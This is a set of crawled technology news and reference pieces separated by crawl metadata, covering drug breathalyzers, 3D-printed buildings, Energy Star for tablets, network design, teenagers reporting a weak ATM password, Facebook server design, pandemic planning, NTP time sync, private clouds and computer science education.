Follow me on Twitter @PrivacyFanatic | <urn:uuid:d190b997-54f6-4bc3-bf44-51c9564089ff> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2221341/microsoft-subnet/darpa-s-spy-telescope-will-stream-real-time-video-from-any-spot-on-earth.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00258-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.915669 | 929 | 2.515625 | 3 |
Law enforcement officials already use breathalyzers to measure drivers' blood alcohol content, but will they soon use the technology to test for cocaine and marijuana use?
Scientists from Stockholm’s Karolinska Institute announced that they have found a method for detecting drugs in people’s systems, according to a new report. Using a breathalyzer-type device, they successfully detected the use of marijuana, cocaine, amphetamine and prescription drugs like diazepam and buprenorphine.
According to Phys.org, the scientists gathered samples from a portable device equipped with a mouthpiece and a micro-particle filter. “When a patient breathes into the mouthpiece, saliva and larger particles are separated from the micro-particles that need to be measured.”
The findings on this new research were published Friday, 26 April, in the Journal of Breath Research.
“Exhaled breath contains very small particles that carry non-volatile substances from the airway lining fluid," according to Phys.org. “Any compound that has been inhaled, or is present in the blood, may contaminate this fluid and pass into the breath when the airways open. The compounds will then be exhaled and can subsequently be detected.” | <urn:uuid:ebb6ae88-5e12-4207-b386-645a0095896e> | CC-MAIN-2017-04 | http://www.govtech.com/technology/Breath-Testing-for-Pot-and-Cocaine.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00562-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929673 | 261 | 2.6875 | 3 |
Within a couple of years, researchers at the University of Southern California believe 3D printing techniques will be used to construct entire buildings in less than a day.
As outrageous as it sounds, such machines can already extrude concrete walls with internal reinforcement fast enough to complete the shell of a 2,000-sq. ft. house in under 20 hours.
The technology was demonstrated this week at the Inside 3D Printing Conference and Expo here.
The robotic extruding method, called Contour Crafting, is comparable to its smaller 3D desktop printer counterparts in that it takes its orders from CAD software, which stores and executes the architectural designs. The designs can be customized on a construction site even as work is underway.
The machines can also automatically embed all the conduits for electrical, plumbing and air-conditioning, as well as place electronic sensors to monitor the building's temperature and health over time.
Behrokh Khoshnevis, a professor of industrial and systems engineering at USC's Viterbi School of Engineering, is leading the effort to perfect the Contour Crafting construction technology.
Khoshnevis said that he expects the technology will be commercially viable within two years.
Contour Crafting could help solve one of the largest problems facing the world today, a lack of decent housing for more than a billion people, Khoshnevis said.
Today, construction is slow, labor intensive, inefficient -- and the most hazardous job in the world, with 400,000 people injured and 6,000 to 10,000 killed in construction accidents every year in the U.S. alone.
"It is wasteful and emission causing and corruption prone. And, the cost is always over budget," Khoshnevis said. "What we aspire to do is create neighborhoods that are dignified at a fraction of the cost, a fraction of the time and far more safety with beautiful architectural designs."
Structures can be constructed not only of concrete but also of hybrid materials. For example, the outer shell of a wall can be plaster with polymer or cement filler. Steel reinforcement in the form of coils can also be added to the mix.
A Contour Crafting machine, which consists of a metal gantry frame along with the robotic extruding system, weighs about 500 pounds. It comes in two pieces and can be quickly erected on a construction site, Khoshnevis said.
The gantry frames can be modified to climb structures, creating one story at a time until it reaches the top of a building. Then the robotic gantry could climb back down the sides of the building.
Each layer of concrete extruded by the machine is four inches thick and about six inches in height. Using special hardeners in the concrete, the material is hard enough to support the next layer by the time the machine circumnavigates the outside perimeter of a structure.
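To put those layer dimensions in perspective, here is a rough sketch of the geometry for the 2,000-sq.-ft. example. The footprint and wall height are hypothetical assumptions; only the 6-inch layer height and the roughly 20-hour shell time come from the article:

```python
# Rough build-geometry sketch for a 2,000 sq. ft. single-storey shell.
length_ft, width_ft = 50, 40     # assumed footprint (50 x 40 = 2,000 sq ft)
wall_height_ft = 10              # assumed wall height
layer_height_ft = 0.5            # 6-inch extruded layers, per the article

perimeter_ft = 2 * (length_ft + width_ft)
layers = round(wall_height_ft / layer_height_ft)
total_pass_ft = perimeter_ft * layers    # total length of extrusion passes

print(layers)                            # 20 layers
print(total_pass_ft)                     # 3600 ft of passes
# Spread over the article's ~20-hour build, that is a modest average
# nozzle speed in feet per minute:
print(round(total_pass_ft / (20 * 60), 1))
```

Even with generous assumptions, the required nozzle speed is only a few feet per minute, which helps explain why each layer has time to harden before the machine circles back around.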
Because the materials are extruded through a nozzle, the walls of a building can take any form - thus the name "Contour Crafting."
The structures can look like the Adobe structures made of mud, clay and straw (or other domestic materials) in Africa, West Asia, and more arid parts of the Americas. Adobe structures have been a construction method for thousands of years; and can last hundreds of years.
"The reason they last is not the material. The strength comes from the geometry," Khoshnevis said. "The worst structures you can use are planar [flat] walls."
Khoshnevis demonstrated the strength of a contoured structure by holding a sheet of paper up and blowing on it, which bent it over. He then rolled the paper in a semi-circle and blew on it again; it remained upright.
Using Contour Crafting on the Moon and Mars
Khoshnevis, who is also a professor of aerospace and mechanical engineering at USC, is working with the National Aeronautics and Space Administration (NASA) on a plan for creating structures on the Moon and Mars.
"The proposal we have is rather than take segments of buildings and transport them there, just take the machinery there ... and use the local material and make them there," Khoshnevis said.
The USC team is in phase two of an advanced concept for the off-world structures.
"The objective of NASA is to build settlements, outposts," he said. "Nothing's been said about human-operated missions. Those can come later."
One problem with constructing landing pads, roads, or blast walls to protect living quarters on other planets is that water cannot be used. Because of the thin atmosphere on Mars, and lack thereof on the moon, water would evaporate from cement or concrete, leaving it to return to its origin of dust and rocks.
The USC researchers solved that problem by melting sulfur for use as a binder, binding the sand like cement.
"We have already shown the ability to build using Martian materials," he said.
The USC team also came up with a plan to combat the high temperatures on the sunny areas of the Moon -- creating interlocking ceramic tiles that can resist temperatures of up to 2,000 degrees Celsius. The tiles can be locked together to create structures. The machines could not only extrude the ceramic material, but a separate component could then assemble the tiles into structures.
Another method of building structures is to use lithium disilicate, a glass-ceramic material that can be heated and poured out like molten lava to form structures on off-planet worlds.
While robotics could handle construction off world, here on Earth Contour Crafting would require far fewer laborers to build houses and other structures. Labor makes up 45% to 55% of construction costs, Khoshnevis said.
"It could be much cheaper than prefab structures and much, much cheaper than conventional construction," he said. "Nothing beats contour construction on cost."
The labor issue has already become a point of controversy -- some observers have complained that machines would replace construction workers, leaving them without jobs, Khoshnevis said.
"My response to that is it's not going to happen overnight," he said. "Second, this is not a new question. When the steam engine was invented they said what's going to happen to carriage drivers?"
Khoshnevis pointed out that at the end of the 19th century in the U.S., 62.5% of Americans were farmers. Today, less than 1% work to grow our produce. "The world did not come to a standstill from such a major change," he said.
This story, "3D Printing Techniques Will Be Used to Construct Buildings, Here and in Outer Space" was originally published by Computerworld. | <urn:uuid:34f199cd-ba5d-4f6f-9e0e-adbac22705c7> | CC-MAIN-2017-04 | http://www.cio.com/article/2382425/hardware/3d-printing-techniques-will-be-used-to-construct-buildings--here-and-in-outer-space.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00102-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954403 | 1,368 | 2.859375 | 3 |
Tablets will be rated based on the Energy Star specification in the future.
The specification will be part of the Energy Star version 6.1, according to documents posted on the U.S. Energy Star website. But a date for ratings on tablets has not yet been established, said Robert Meyers, product manager at Energy Star computers. Energy Star is a joint effort between the U.S. Environmental Protection Agency and the U.S. Department of Energy.
The Energy Star specification helps shoppers identify the most power-efficient products when making purchases. The Energy Star program already covers laptops, desktops, monitors, light bulbs, servers, household appliances and other products that are identified with a label. The use of Energy Star-labeled products helped cut close to $18 billion from U.S. utility bills in 2010, according to the organization.
The EPA and DOE originally floated the idea of including tablets as part of Energy Star version 6.0 for products like laptops, desktops, displays, thin clients and networking equipment, which goes into effect on June 1. Some IT vendors that participate in the Energy Star program argued against the immediate inclusion of tablets, saying that those devices are more like smartphones than PCs and have different assembly and equipment. They argued that tablets and laptops differ on components such as batteries and networking equipment, and thus cannot be grouped together with PCs. The EPA and those stakeholders are now trying to reach a consensus on the definition of tablets and how to rate the devices.
"Defining and differentiating tablets will be part of the process, but at this point we don't have anything concrete," Meyers said.
An Energy Star standard for tablets would deliver a decrease in energy use over the life of a device, said Casey Harrell, IT analyst at Greenpeace International.
"It won't remove hazardous materials from a product ... but indirectly will impact toxic pollution. More energy efficient devices use less energy and less pollution from those energy sources," Harrell said.
Energy Star should be more ambitious, but at a ground level, the standard sets the ball rolling in the right direction around energy savings in tablets, Harrell said.
"Creating a product-specific standard, like [for] tablets, allows for the standard to be built more uniquely for these specific products and gives the products an opportunity to compete in an apples-to-apples environment," Harrell said. "For a long time, many devices -- netbooks, even game consoles -- were looped into the same PC standard."
Energy Star is a key metric in the EPEAT (Electronic Product Environmental Assessment Tool) rating, which is used by many government organizations and universities to make hardware purchases. EPEAT also takes into account toxic elements, material selection, product longevity and other energy efficiency attributes to rate environmentally friendly hardware. | <urn:uuid:d6218f60-de14-4a3e-a074-cfd7957b6847> | CC-MAIN-2017-04 | http://www.itworld.com/article/2714907/consumerization/tablets-to-get-energy-star-ratings.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00314-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940462 | 577 | 2.640625 | 3 |
And perhaps this car breaks down one too many times, or we have children and need more space or for a host of other reasons we determine that it is time to replace it with a new one.
We visualize the need for better service, access, technology, or perhaps even capacity.
The cycle of a network's life is similar: idea or concept, design and implementation, operation, legacy integration, and eventually transformation. This article will examine the development or transformation of a network using a life-cycle model and demonstrate how this process can benefit an organization.
There are four basic steps to the transformation process: assessment, architecture and design, implementation, and operations.
Conception, or the beginning of the process, occurs when an organization realizes that change is needed. After obtaining the necessary approvals and securing funding, the transformation process has begun.
The process of transformation requires as much understanding of the past and current network as of what the network will need to be in the future. This task is not as simple as it would seem, for counting and classifying switches and routers is merely the first step.
A comprehensive survey and documentation of all active and passive components is required to determine if anything is re-usable, if right-of-ways or building access points currently in place will meet your needs, and to determine if environmental controls, fire suppression, and backup power are sufficient to support any new equipment.
This is by no means a comprehensive list, but is a good indicator of what is generally required.
In the assessment phase, you will want to evaluate what sensors will be needed in the network. The impact of adding various chemical, biological, radiological, environmental, and video sensors to networked systems can be significant. Increasingly, such monitoring equipment is required in various rooms, buildings, and campuses as a result of heightened security concerns.
While individual sensors may contribute less significantly to the overall network load, large numbers of these sensors acting simultaneously may cause congestion. The resulting data loss can impede the ability to respond to an incident and can inhibit an organization's ability to determine the cause(s) during the critical forensic analysis phase that occurs post-incident.
It is important to point out the specific need to address sensors in this phase because these types of technologies are becoming more common and too often, sensors are implemented into a network without proper planning.
As you continue the assessment, gather all existing documentation and compare it to the infrastructure. Update it as you go.
While it may appear that more emphasis is being put on assessment than on the other areas, that is because it is the most critical element; the other three areas will not function well over time if this step is hurried or overlooked.
After assessment, the seed is planted and you're "pregnant" with the idea of a new environment to operate in. But before birth occurs, like any proud parent, you are planning for its future. This requires architecture and design.
Network design is sometimes looked upon as a process of simply connecting the dots. This is the simplest of design and does not meet the needs of many organizations.
Good network design takes into account all of the servers, applications, storage modules, projected usage patterns, and a well-educated estimate as to future expansion of the network (users and sites). Robust designs allow the dynamic addition of users and sites, along with the associated traffic, with little or no impact to the original user set.
Begin with an architecture that defines the overall functions of the network but doesn't specify equipment. This is similar to a mechanical engineer designing a vehicle that can accommodate a large payload, or have the capacity to reach 0 to 60 in 6 seconds.
Once that is accomplished, you can move to a design phase where you choose technologies and vendors and finalize details such as location, power, fire suppression, security, and access. Include the network management function, spares and maintenance plans, and help desk network elements as part of the architecture and design functions.
Both the architecture and designs should have written documentation explaining details along with drawings at various levels of complexity. It is critical that the high level perspective of this documentation be understandable by non-technical personnel, as these will be presented for review to executive teams for final approval of funding.
Like a child, a network goes through different stages before becoming an adult. The network may come online in segments, but, as with any building project, implementation begins from the ground up.
In the network world this denotes the elements at the bottom of the Open Systems Interconnection (OSI) stack, or the cabling. Cable plant is often the most difficult piece to implement, especially if you're required to dig trenches to lay cable between buildings or across town.
These are also the most expensive elements and the longest to deploy as they usually require environmental impact studies, special building permits, and depend on weather conditions in some areas of the country. Short haul wireless solutions can sometimes overcome the need to trench cable.
Building new networks from scratch is often much easier than transforming existing infrastructures, as there is no need to plan around current users. In the case of transforming existing systems, construction must occur in parallel with the functioning network.
After the physical build-out is complete, the logical elements of routing, security, numbering, and naming are installed and tested. To minimize impact to the business, testing must be coordinated with users, since it usually involves outage periods or transitioning users from one network to another.
This can be especially tricky when the site also holds applications or storage for mission critical systems. If possible these sites should be tested either first or last in sequence, or they may be transitioned to temporary facilities to minimize impact to the enterprise.
Once a network matures and reaches adulthood, it occasionally needs medical attention.
Circuits, routers, switches, cables, connectors and the like may suffer failure or degradation. Routers need logical "tune ups," users and applications come and go, or new server equipment and storage is needed.
And like an annual physical, all of this equipment and their associated configurations need to be reviewed on a regular schedule to ensure optimum performance. It is critical that the documentation of all aspects of the network be maintained and available, just as a medical record for a human must be current and accurate to ensure proper treatments are applied.
The transition from an aging, suboptimal networking environment to a modern high-performance network is an involved process. We are often required to relinquish processes, personnel, and equipment that has in the past seen us through difficult times.
As in the cycle of life, this passing of the familiar and safe can be unsettling. And, as in the cycle of life, the birth of a new environment can be welcomed with much celebration. | <urn:uuid:e17290a5-dc4b-464c-9594-341b55576776> | CC-MAIN-2017-04 | http://www.cioupdate.com/insights/article.php/3502296/Life-as-a-Network.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00130-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947017 | 1,372 | 2.5625 | 3 |
For hackers everywhere the prospect of carrying out an ATM attack is like finding the holy grail. Such an incursion presents direct access to money, allowing cybercriminals to bypass any other channels and get right to the good stuff.
One would assume that a breach of an ATM would be malicious, focused on extracting quick cash and disappearing back into the dark recesses of the cybersphere. One may also assume that such an attack would be carried out by an adult, or at least someone old enough to manage his or her own (criminal) finances.
But a recent breach of an ATM in Montreal undermined those two suppositions, since it was neither malicious nor conducted by adults. In this case, the hackers were a couple of high schoolers on lunch break, and their motive was better enterprise security for the bank.
A Rather Productive Lunch Break With Some Great Food For Thought
According to The Winnipeg Sun, Montreal ninth graders Matthew Hewlett and Caleb Turon recently decided that they’d have a unique adventure on a recent lunch break. While the rest of their peers presumably crowded into local restaurants or walked the school halls with brown paper bags in tow, Hewlett and Turon did something entirely different: They went to an ATM operated by the Bank of Montreal. Their goal was simple: Crack the code and gain administrative access to the machine.
But Hewlett and Turon weren’t heading into their hack ill-prepared. Before reaching the ATM, they’d surfed the Web and found an ATM operational guide that described how to get access to the administrative mode of the exact machine they stood in front of during this fateful lunch hour.
It was unclear to the boys if the guide they’d found online would work for the bank’s ATM or if it was outdated.
“We thought it would be fun to try it, but we were not expecting it to work,” Hewlett said later.
Yet after following the instructions from the online printout, they were met with an encouraging sign: A screen, on the ATM, asking them for a password. The only downside was that they had no idea what the password could be. So they typed in 6 common digits — think something along the lines of “123456” or “654321.”
Whatever combination they typed in — according to ZDNet, the exact password isn’t being released to the public — it worked, and the two boys found themselves with administrative access not only to the ATM but also, by extension, to privileged information at the bank.
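The exact password was never disclosed, but some simple arithmetic shows why any 6-digit numeric default is weak. The password and default list below are purely hypothetical stand-ins:

```python
# A 6-digit numeric password has only a million possibilities.
keyspace = 10 ** 6              # digits 000000 through 999999
guesses_per_second = 1          # one manual attempt per second at the keypad
worst_case_days = keyspace / guesses_per_second / 86_400
print(round(worst_case_days, 1))  # under two weeks to exhaust, even by hand

# A short list of common defaults shrinks the search to a handful of tries.
common_defaults = ["123456", "654321", "000000", "111111", "123123"]
secret = "123456"               # hypothetical; the real password is not public
tries = next(i + 1 for i, p in enumerate(common_defaults) if p == secret)
print(tries)                    # found on the very first guess
```

The lesson for defenders is the same one the boys delivered in person: a short numeric default offers essentially no protection against anyone who bothers to look up the manual.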
But then the boys did something that sets them apart from all the malicious hackers out there: They went right to the bank and reported the problem. It took some convincing of the bank staff, but once they did the staff was grateful to the young men for helping expose a major security flaw.
There was only one problem: The boys were late for school.
The bank fixed that by sending them back with a note: "Please excuse Mr. Caleb Turon and Matthew Hewlett for being late during their lunch hour due to assisting BOM with security."
The message of this story is clear: If a couple of (admittedly enterprising) high schoolers can break into your business’ system, it’s probably time for some better security. | <urn:uuid:9ab74def-dcdf-49df-b4cd-76a23fa0e08f> | CC-MAIN-2017-04 | https://www.entrust.com/two-kids-hack-atm-think/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00553-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.975319 | 692 | 2.71875 | 3 |
Facebook revealed today that it tried using potatoes in its servers to make them more environmentally friendly.
Under the Open Compute Project (OCP), Facebook is on a mission to improve the efficiencies of the servers, storage devices and data centres that are used to power its social networking platform. Any breakthroughs that the company makes are shared with the rest of the OCP community so that they too can improve their own efficiencies and reduce the overall environmental impact of IT on the world.
"We disposed of anything that wasn't useful," said Facebook's VP of hardware design and supply chain operations Frank Frankovsky at a briefing in London.
This included removing the top lids from its servers, but that resulted in a lack of airflow over the central processing unit (CPU), causing them to overheat.
The company tried to use a plastic cover to redirect the airflow over the CPU but this didn't sit well with Frankovsky. "That was really frustrating for me because we eliminated all this material and then we put a plastic lid on the thing," he said. "That's just more material in the waste stream."
Facebook then considered whether it was possible to make the lid out of a more eco-friendly material. Frankovsky confessed that he even tried using the material that is also used to make Spudware kitchen utensils, which are composed of 80 percent starch and 20 percent soy oil.
"We created a thermal lid out of that starchy material but we found out pretty quickly that when you heat that up it smells a lot like French Fries," said Frankovsky.
Besides making data centre workers rather peckish, the Spudware material also went floppy and gloopy, he continued.
Frankovsky went on to argue that other datacentre operators should try and "push the envelope a little bit harder" in order to drive innovation and improve efficiencies.
Indeed, Facebook has recorded a power utilisation effectiveness (PUE) rating of 1.07, which far surpasses the industry's "gold standard" of 1.5.
The PUE is a measure of how much electricity gets to the server compared to how much is taken off the grid.
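In code, the PUE comparison works out like this. The 1,000 kW IT load is an arbitrary example figure; the 1.07 and 1.5 ratios come from the article:

```python
def pue(total_facility_kw, it_equipment_kw):
    """Power Usage Effectiveness: total power drawn vs. power reaching IT gear."""
    return total_facility_kw / it_equipment_kw

# For every 1,000 kW of IT load:
it_kw = 1000
facebook_total = it_kw * 1.07   # Facebook's reported PUE
typical_total = it_kw * 1.50    # the industry "gold standard" cited above

overhead_saved_kw = typical_total - facebook_total
print(pue(facebook_total, it_kw))   # 1.07
print(overhead_saved_kw)            # 430 kW less overhead per MW of IT load
```

Put another way, for every megawatt of servers, a 1.07 facility pulls 430 kW less from the grid than a 1.5 facility just to deliver the same compute.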
Facebook is able to achieve such efficiencies partly because it runs its data centres without air conditioning, instead relying on the outside air to cool its servers and prevent them from overheating. This means that it doesn't have to use up electricity for cooling purposes.
The result is a facility that is 38 percent more efficient and 24 percent less expensive than predecessor data centres, said Frankovsky.
Sceptics argue that Facebook is only able to create super-efficient data centres because it is building them from scratch, whereas normal businesses are committed to their data centres for at least 20 years.
However, Frankovsky pointed out that Facebook was still able to achieve efficiency savings of 30 percent when it was leasing space in someone else's data centre.
"We started turning off computer room air conditioning. We started separating hot aisle from cold aisle," he said. "These were things our co-location landlords hadn't done."
There are very few parts of the world that are so hot and humid that you can't get the inlet temperatures down to a point where the electronics would survive, according to Frankovsky.
"Even if [eliminating] air conditioning is not a risk they're willing to take, I think there's a lot that can be done in electrical efficiency. Eliminating the uninterruptible power supply (UPS) would be one easy way. These cost $2 a Watt while the OpenCompute battery racks we've open sourced cost $0.25. It's also far more efficient because they're not converting the AC to DC."
Facebook has even taken steps to reduce the carbon footprint of the lorries that transport equipment from Germany to its only European data centre, in Lulea, Sweden.
"We design the rack enclosure, as well as the pallets that it transports on, to be able to pack a truck 100 percent, so we don't have any wasted space on a truck and we don't have any wasted transportation costs," he said.
This story, "Facebook Tries Putting Spuds in Servers to Make Them More Eco-Friendly" was originally published by Techworld.com.
Virus outbreaks, plagues and mass infections have captivated movie-going audiences for years through such classics as 28 Days Later, Outbreak, I Am Legend and, most recently, World War Z. They are among Hollywood's favorite antagonists, but what would happen if these hypothetical pandemics became a reality? Would the public be prepared? How would businesses survive, or thrive, without their workforce? The answers may be shocking.
Pandemics, which are global outbreaks, and epidemics, or regional outbreaks, have been around as long as the human species, and have obtained notoriety in history books and religious tomes alike. Though modern medicine has limited major occurrences, fast-spreading diseases are on the rise worldwide, including the Ebola virus in Africa, bubonic plague in China and chikungunya virus in the United States. Let’s not forget the all too common influenza virus, which pops up every year during the winter and spring months.
The chances of spreading these diseases from one country to the next have increased, thanks to international travel and mass transit. To combat these threats, companies are now taking a serious look at how they can prepare against such outbreaks.
How companies can place outbreaks above output
According to the Insurance Information Institute, 40 percent of businesses affected by a man-made or natural disaster never reopen. This is especially alarming since, based on a recent study by Saint Louis University, a majority of companies are not adequately prepared to handle a pandemic or epidemic.
One of the main challenges companies face is a lack of knowledge and awareness when it comes to preventing the spread of diseases and germs. While some cultures encourage employees to stay at home when they are ill, others stress working through the day, placing output above outbreaks. According to the Centers for Disease Control and Prevention (CDC), this mindset contributes to up to $10.4 billion in hospitalization and outpatient costs when employees contract, and spread, viruses such as the flu.
An office environment isn’t the only way germs and diseases are spread. Supply chains are also susceptible to, and mainly responsible for, the spread of illness. When an outbreak occurs, companies must not only protect their employees and internal workforce, but they should also consider their vendors and supply chains to reduce the possibility of transferring bugs and subsequently increasing the chances of a nationwide or worldwide pandemic.
Besides monitoring conditions externally, the most important part of restricting a pandemic or epidemic outbreak is observing employees' health conditions. It's especially important to advise sick employees to go home if there is a chance a virus or bacterial infection could spread to colleagues or customers. According to the CDC, workers who appear to be contagious should be separated from fellow colleagues, sent home and kept from returning to work until at least 24 hours after they are fever free. Due to the close quarters of an office, it can be difficult to stop the spread of germs, which is why offices should install hand sanitizers, remind staff to clean up their work areas and encourage employees to get vaccinated. Poor office hygiene not only creates high healthcare costs; companies can also suffer financially from a reduced workforce, diminished productivity and increased downtime.
Common pandemic misconceptions
Many businesses believe that the only way germs are spread is through direct contact; however, that is not the case in most situations. Transmission routes, which are how a disease is passed, take a number of forms, including:
•Droplet contact – coughing or sneezing on another person
•Direct physical contact – touching an infected person
•Indirect contact – touching a contaminated surface or substance, such as a mosquito spreading chikungunya or a parasitic worm in undercooked food
•Airborne – microorganisms that can remain active in the air for long periods of time
•Fecal-oral – contaminated food or water sources
According to a survey by Harvard's School of Public Health, two-thirds of companies surveyed said they could not operate if more than half of their employees were out for two weeks or more. By building the response phases outlined below into a business continuity plan, companies can reduce downtime, plug profit leaks and, more importantly, safeguard personnel.
Curbing corporate pandemics and epidemics
Similar to a hurricane or tropical threat, the impacts of a pandemic, or an epidemic, can spread through the local community. Schools and government services may close. Retail stores and pharmacies will likely have a shortage of items such as medicine, gas, food and water. There may be a longer wait time at doctor’s offices, urgent care facilities and emergency rooms. To avoid this type of panic among employees, below are four simple steps that companies can apply to their business continuity plan.
START – Confirmed cases are verified.
•Communicate to key stakeholders – Stakeholders are employees, vendors, corporate executives and customers who will be affected by the company’s delays and/or shutdowns. Remind personnel of the preparedness steps the organization has in place, as well as what they should be doing to protect themselves from germs.
•Inventory resources – Take stock of available resources, such as employees and sanitizing materials, and of what customers and vendors will require to continue operations. This is the time to review employees' travel plans and determine who is available to help alleviate the extra workload. Remote computing capabilities may be the answer to continuing workflows.
•Review response plans – Similar to other corporate response plans, a company should already have in place their crisis management team and have defined their roles in response to the event.
ACCELERATE – Two or more cases are confirmed locally or near the office.
•Continue open dialogue – Companies should maintain communication among stakeholders and initiate accountability with personnel. If additional employees become sick, companies should consider travel restrictions for all personnel.
•Commence response strategies – Employers should encourage social distancing and distribution of appropriate office supplies and fuel. For example, if employees or family members are sick, the affected employee should stay home, maintain a three meter radius from fellow colleagues and wipe all surfaces at the beginning and end of a shift.
•Evaluate operations – The crisis management team should determine whether to suspend, transfer or maintain operations.
PEAK – Ten percent of the community is infected.
•Continue communication and accountability with personnel – this includes daily messaging to personnel regarding the infection and spread of the disease.
•Initiate distributed operations – Continue social distancing and encourage employees to telecommute if more than 25 percent of schools in the area are closed.
•Engage employee assistance program (EAP) – If an employer doesn’t already have an employee assistance program in place, now is the time to create a special plan to assist personnel with private concerns, including access to legal, medical, mental and other professional resources. During a peak pandemic attack, the EAP will serve as a hotline for those individuals who need additional resources and are unable to access the company directly.
DECELERATE – Less than ten percent of the community is infected and the number continues to decline.
•Continue messaging – Employees should be made aware of back-to-work policies. Communicate with both vendors and suppliers about the company’s plans to resume normal workflow.
•Return to normal operations – Employers should encourage personnel to stay home if they are still ill; however, a company’s top priority should be to return to critical staffing levels.
•Continue employee assistance program – Continue the EAP hotline to assist employees with any questions regarding how they will recover from an outbreak and provide the necessary help to their families.
Companies can spend thousands of dollars or more trying to stop the spread of a pandemic or epidemic outbreak once it starts, but there is a simpler way: stop the incident before it starts. Attention to good hygiene is the best line of defense and the most cost effective for companies. Don't wait until it's too late - prepare your employees now before their coworkers begin coughing and sneezing.
Time synchronization is a service that maintains consistent server time across the network. Time synchronization is provided by the server operating system, not by eDirectory. eDirectory maintains its own internal time to ensure the proper order of eDirectory packets, but it gets its time from the server operating system.
If your network uses Windows or Linux, you should use Network Time Protocol (NTP) to synchronize the servers, because it is a widely used standard for time synchronization.
NTP functions as part of the UDP protocol suite, which is part of the TCP/IP protocol suite. Therefore, a computer using NTP must have the TCP/IP protocol suite loaded. Any computers on your network with Internet access can get time from NTP servers on the Internet.
NTP synchronizes clocks to Coordinated Universal Time (UTC), the international time standard.
NTP introduces the concept of a stratum. A stratum-1 server has an attached accurate timepiece such as a radio clock or an atomic clock. A stratum-2 server gets time from a stratum-1 server, and so on.
For more information on time synchronization software, see The Network Time Protocol Web site.
For information on time synchronization for Windows 2000 servers, see Setting Time Synchronization With Windows 2000 Web site.
You can use the xntpd Network Time Protocol (NTP) daemon to synchronize time on Linux servers. xntpd is an operating system daemon that sets and maintains the system time-of-day in synchronism with Internet standard time servers.
For information on running ntpd on Linux systems, see ntpd - Network Time Protocol (NTP) Daemon.
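As an illustration, a minimal NTP client configuration on Linux might look like the sketch below (the pool.ntp.org hostnames are the public NTP pool; a production deployment would usually point at internal stratum-1 or stratum-2 servers instead):

```conf
# /etc/ntp.conf -- minimal illustrative client configuration
# Query several servers so the daemon can detect and discard a "falseticker".
server 0.pool.ntp.org iburst
server 1.pool.ntp.org iburst
server 2.pool.ntp.org iburst

# Record the clock's drift rate so the daemon converges faster after a restart.
driftfile /var/lib/ntp/ntp.drift
```

Once the daemon is running, `ntpq -p` lists each peer along with its stratum and the current offset, which is a quick way to confirm the server is actually synchronized.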
To verify that time is synchronized in the tree, run DSRepair from a server in the Tree that has at least Read/Write rights to the Tree object.
Click> > > .
Run the following command:
DELL EMC Glossary
What is a Private Cloud
A fully virtualized data center with self-service and automation. Self-service and automation are the critical capabilities that increase agility and differentiate a private cloud from a merely virtualized data center.
Who uses private clouds and why?
Mid to large corporate and government entities implement a private cloud to achieve greater business agility, increase efficiency, and gain competitive advantage.
In a traditional IT environment, application software and the supporting hardware is procured, managed, and funded in silos, and generally implemented over a period of months. A private cloud infrastructure enables access to a variety of IT resources in minutes to hours and aligns costs to actual consumption.
By enabling the organization to initiate projects faster, capitalize quickly on new capabilities and revenue opportunities, and respond nimbly to market changes, moving to a private cloud elevates IT from cost center to strategic partner.
How does the private cloud work?
Virtualization technologies provide the foundation for a private cloud, whereby IT resources are uncoupled from physical devices. To fully capture the benefits of a private cloud requires an infrastructure optimized for virtualization and tightly integrated.
Moving from a traditional IT environment to a private cloud and delivering IT-as-a-service (ITaaS) also requires new roles, skills, and significant operational changes. Users access services through a self-service catalog of pre-defined configurations, with usage metered and charged accordingly.
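The metering-and-chargeback idea can be sketched with a toy rate card (the metrics and rates below are invented for illustration; real private cloud tools meter many more dimensions, such as network traffic and software licenses):

```python
# Hypothetical rate card: price per unit of each metered resource.
RATES = {"vcpu_hours": 0.04, "ram_gb_hours": 0.005, "storage_gb_days": 0.002}

def chargeback(usage: dict) -> float:
    """Price a department's metered usage against the rate card."""
    return sum(RATES[metric] * amount for metric, amount in usage.items())

# One department's metered consumption for the month.
marketing = {"vcpu_hours": 1200, "ram_gb_hours": 4800, "storage_gb_days": 500}
print(round(chargeback(marketing), 2))  # 73.0
```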
What are the benefits of the private cloud?
• Greater efficiency – resources are virtualized and pooled, ensuring physical infrastructure is used to its maximum capacity.
• Greater agility – IT resources can be provisioned on demand and returned to the resource pool just as easily.
• Rapid scalability – instantly allocate additional computing resources to meet business demands due to peak seasons, company growth or decline
• Lower costs - infrastructure, energy, and facility costs, “pay as you use” model
• Greater IT staff productivity – Automated provisioning through self-service portal
• Reduce wasted resources – transparent pricing and metering and chargeback tools allow IT admins to pinpoint where costs can be cut
• Higher utilization of IT investments
• Enhanced security and protection of information assets
For Obama administration officials, computer science education has become almost a moral issue.
On the occasion of the release of a new report quantifying the economic benefit of the U.S. software industry, senior officials from the White House and the Department of Education described their efforts to expand computer science instruction for K-12 students, and even to introduce basic programming concepts at the preschool level.
[ Related: New programs aim to boost computer science education ]
During a panel discussion at the New America Foundation, Melissa Moritz, deputy director of STEM -- science, technology, engineering and math -- at the Education Department, noted the ethnic and gender imbalances in computer science education. Still a rarity at schools across the country, computer science classes are disproportionately unavailable to low-income students, according to Moritz, who argued that biases -- conscious or unconscious -- deter many minority and female students from pursuing the field that is accounting for more wage growth in the U.S. economy than any other sector.
"One of the big places where the Department of Education has chosen to focus in terms of STEM -- which we include computer science in STEM -- has been around equity, and really wanting to treat computer science access as an equity issue, because it is," Moritz said.
